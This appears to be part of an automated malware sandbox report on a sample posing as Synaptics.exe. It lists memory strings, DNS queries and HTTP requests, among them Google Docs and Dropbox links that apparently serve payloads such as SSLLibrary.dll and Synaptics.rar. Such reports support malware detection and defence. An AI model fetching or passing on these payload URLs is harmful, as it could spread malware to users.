                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoZ
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx;overflow:hidden
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse%
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000009.00000000.353930908.00000000054BB000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduZ
                                Source: Synaptics.exe, 00000009.00000000.369282651.0000000007970000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.409428989.0000000007970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000009.00000000.354060181.00000000054DA000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000009.00000000.353368197.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.368763752.0000000005494000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408309147.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~x
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://entitlement.diagnostics.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.ppe.windows.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.ppe.windows.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.windows.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://graph.windows.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://incidents.diagnostics.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://invites.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://lifecycle.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.microsoftonline.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows.local
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://management.azure.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://management.azure.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://messaging.engagement.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://messaging.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ncus.contentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ncus.pagecontentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officeapps.live.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://onedrive.live.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://onedrive.live.com/embed?
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://osi.office.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://otelrules.azureedge.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pages.store.office.com/review/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://powerlift.acompli.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://roaming.edog.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://settings.outlook.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://shell.suite.office.com:1443
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://skyapi.live.net/Activity/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://staging.cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://store.office.cn/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://store.office.de/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://tasks.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://web.microsoftstream.com/video/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://webshell.suite.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://wus2.contentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://wus2.pagecontentsync.
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dll
                                Source: RCXDA77.tmp.9.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://www.odwebp.svc.ms
                                Source: unknownDNS traffic detected: queries for: docs.google.com
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,6_2_00474D50
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
